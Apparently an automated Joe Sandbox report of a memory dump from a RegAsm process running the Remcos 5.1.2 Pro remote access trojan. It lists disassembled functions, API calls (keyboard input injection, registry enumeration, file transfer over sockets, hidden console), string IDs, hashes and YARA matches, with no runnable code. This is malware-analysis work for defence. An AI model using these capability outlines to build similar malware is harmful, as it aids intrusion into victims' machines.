                                                                                                                                                                                                  • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                                                                                                                                  • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                                                                                                                                                                  Function 0044CE00 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                                                                                                                                                                  • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                                                                                                                                  Function 004475F1 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 389COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __freea$__alloca_probe_16_free
                                                                                                                                                                                                  • String ID: a/p$am/pm$h{D$t'`/
                                                                                                                                                                                                  • API String ID: 2936374016-2929343098
                                                                                                                                                                                                  • Opcode ID: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                                                                                                                                                                  • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                                                                                                                                                  Function 00414945 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: tcp$udp
                                                                                                                                                                                                  • API String ID: 0-3725065008
                                                                                                                                                                                                  • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                                                                                                                  • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                                                                                                                                                  Function 00444D7C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                                                  • _free.LIBCMT ref: 00444E87
                                                                                                                                                                                                  • _free.LIBCMT ref: 00444E9E
                                                                                                                                                                                                  • _free.LIBCMT ref: 00444EBD
                                                                                                                                                                                                  • _free.LIBCMT ref: 00444ED8
                                                                                                                                                                                                  • _free.LIBCMT ref: 00444EEF
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                                                                                  • String ID: KED$t'`/
                                                                                                                                                                                                  • API String ID: 3033488037-4184823727
                                                                                                                                                                                                  • Opcode ID: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                                                                                                                                                                  • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                                                                                                                                                  Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                                                                                                                                  • ExitThread.KERNEL32 ref: 004018F6
                                                                                                                                                                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                                                                                                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                                                                                  • String ID: PkG$XMG$NG$NG
                                                                                                                                                                                                  • API String ID: 1649129571-3151166067
                                                                                                                                                                                                  • Opcode ID: 550caf075e583e476d87b570dd8e50d88aac4017f2d84a61fa09579770db8c75
                                                                                                                                                                                                  • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 550caf075e583e476d87b570dd8e50d88aac4017f2d84a61fa09579770db8c75
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                                                                                                                                                                  Function 0040799E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                                                                                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00407A88
                                                                                                                                                                                                  • MoveFileW.KERNEL32 ref: 00407AA5
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                                                                                                                                                    • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                                                                                                                                                    • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                                                                                  • String ID: .part
                                                                                                                                                                                                  • API String ID: 1303771098-3499674018
                                                                                                                                                                                                  • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                                                                                                                                  • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                                                                                                                                                  Function 0041CE2C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • AllocConsole.KERNEL32 ref: 0041CE35
                                                                                                                                                                                                  • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                                                                                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Console$Window$AllocOutputShow
                                                                                                                                                                                                  • String ID: Remcos v$5.1.2 Pro$CONOUT$
                                                                                                                                                                                                  • API String ID: 4067487056-1584637518
                                                                                                                                                                                                  • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                                                                                                                                  • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                                                                                                                                                                  Function 004199DB Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SendInput.USER32 ref: 00419A25
                                                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                                                                                                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                                                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                                                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                                                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                                                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                                                                                                                                                  • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                                                                                                                                                    • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InputSend$Virtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1167301434-0
                                                                                                                                                                                                  • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                                                                                                                  • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                                                                                                                                                  Function 004413EA Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 0-2084328917
                                                                                                                                                                                                  • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                                                                                                                                  • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                                                                                                                                                  Function 00413A90 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Enum$InfoQueryValue
                                                                                                                                                                                                  • String ID: [regsplt]$xUG$TG
                                                                                                                                                                                                  • API String ID: 3554306468-1165877943
                                                                                                                                                                                                  • Opcode ID: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                                                                                                                                                  • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                                                                                                                                                                  Function 004493E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                                                                                                                                  • _free.LIBCMT ref: 0044943D
                                                                                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                                                  • _free.LIBCMT ref: 00449609
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 1286116820-2084328917
                                                                                                                                                                                                  • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                                                                                                                                  • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                                                                                                                                                                  Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                                                                                                  • __fassign.LIBCMT ref: 1000954F
                                                                                                                                                                                                  • __fassign.LIBCMT ref: 1000956A
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                  • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                                                  • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                                                                                                  Function 00413D48 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                                                                                                                                                                                                    • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                                                                                                                    • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                                                                                                  • String ID: xUG$NG$NG$TG
                                                                                                                                                                                                  • API String ID: 3114080316-2811732169
                                                                                                                                                                                                  • Opcode ID: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                                                                                                                                                                                                  • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                                                                                                                                                                  Function 00443E99 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 269201875-2084328917
                                                                                                                                                                                                  • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                                                                                                                  • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                                                                                                                                                  Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
